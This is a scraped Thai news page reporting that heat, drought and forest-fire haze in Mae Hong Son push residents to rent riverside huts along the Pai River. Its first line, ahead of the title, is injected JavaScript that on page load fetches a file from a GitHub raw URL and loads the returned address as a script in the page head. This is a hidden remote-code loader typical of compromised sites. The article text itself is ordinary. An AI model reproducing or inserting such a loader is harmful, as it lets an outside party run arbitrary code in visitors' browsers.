;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); แม่ฮ่องสอน ร้อนแล้งหมอกควันไฟป่าหนัก ผู้คนหนีร้อนลงแช่น้ำในแม่น้ำปาย - ThaiReference | อาสาไทยยืนยัน
แม่ฮ่องสอน ร้อนแล้งหมอกควันไฟป่าหนัก ผู้คนหนีร้อนลงแช่น้ำในแม่น้ำปาย

 สภาพอากาศที่ร้อน แล้งและเต็มไปด้วยหมอกควันไฟป่าแบบนี้ หลายคนหลีกเลี่ยงจะออกนอกบ้าน แต่ยังมีผู้คนจำนวนไม่น้อยหาทางดับร้อนตามซุ้มริมน้ำปายและอีกหลายแห่งของจังหวัดแม่ฮ่องสอน สร้างรายได้ให้กับพ่อค้าแม่ค้าคนในพื้นที่มากตามไปด้วย

 จากความเปลี่ยนแปลงของสภาพอากาศและยังต้องเจอกับปัญหาของหมอกควันจากไฟป่าปกคลุมอยู่ในจังหวัดแม่ฮ่องสอนอยู่ในขณะนี้ พบว่าผู้คนส่วนมากจะหาทางหลีกเลี่ยงที่จะไม่ออกจากบ้านหรือทำกิจกรรมอื่นๆ นอกบ้าน เพื่อหลีกเลี่ยงผลกระทบที่จะเกิดขึ้นต่อสุขภาพ โดยเฉพาะในกลุ่มของคนสูงอายุหรือเด็กๆ และในกลุ่มของผู้ป่วยที่มีโรคประจำตัวเกี่ยวกับระบบทางเดินหายใจ คนที่เป็นโรคภูมิแพ้ ที่จะต้องหลีกเลี่ยงการออกมากลางแจ้งในระยะนี้

 แต่ในขณะเดียวกันก็ยังพบว่าแหล่งพักผ่อนที่น่าสนใจและคลายร้อนได้ ซึ่งกำลังได้รับความนิยมอย่างมากก็คือ ซุ้มริมน้ำ ที่มีอยู่ทั้งตลอดสองข้างริมฝั่งของแม่น้ำปาย แม่น้ำแม่สะงา-แม่สะงี หรือทุกอำเภอก็จะซุ้มริมน้ำเหล้านี้ไว้คอยให้บริการกันทุกแห่ง โดยจะมีการสร้างซุ้มยื่นเข้าไปในน้ำและมีทั้งอาหาร เครื่องดื่มต่างๆ ไว้คอยให้บริการ ซึ่งจะมีการคิดค่าเช่าซุ้มละ 50-60 บาทและจะต้องสั่งอาหารจากซุ้มที่ไปเช่าด้วยเช่นกัน นอกจากนี้ยังมีให้บริการเช่าห่วงยางหรือนำยางในรถยนต์มาสูบลมให้เต็ม เพื่อเช่าออกไปเล่นน้ำได้ไกลมากกว่าริมซุ้มของตนเองได้อีกทางหนึ่ง แต่จะกำหนดเวลาไว้ว่าให้บริการได้เฉพาะช่วงดวงอาทิตย์ขึ้นจนถึงดวงอาทิตย์ตกเท่านั้น ทั้งนี้เพื่อไม่ให้เกิดปัญหาการมั่วสุมหรือก่อเหตุทะเลาะวิวาทกันตามมาได้ เพราะแต่ละซุ้มก็จะไม่มีไฟฟ้าหรือสิ่งอำนวยความสะดวกอื่นๆ ด้วยเช่นกัน ยิ่งช่วงนี้เป็นช่วงปิดเทอมก็จะมีเด็กๆ และเยาวชนเข้าไปใช้บริการหลบร้อนกันอย่างมากมายทีเดียว

วิรัตน์ นันทะพรพิบูลย์ จ.แม่ฮ่องสอน

[dsm_icon_divider use_icon=”on” font_icon=”||divi||400″ use_icon_font_size=”on” icon_font_size=”25px” divider_style=”dashed” _builder_version=”4.25.2″ _module_preset=”default” module_alignment=”center” global_colors_info=”{}”][/dsm_icon_divider]
[dsm_blog_carousel posts_number=”20″ posts_offset=”1″ include_categories=”3,5,4″ use_date=”off” use_category=”on” use_author=”off” use_readmore=”on” readmore_text=”อ่านเพิ่ม…” post_equal_height=”on” _builder_version=”4.25.2″ _module_preset=”default” title_font_size=”25px” min_height=”482px” custom_margin=”||639px||false|false” custom_padding=”||340px|||” global_colors_info=”{}”][/dsm_blog_carousel]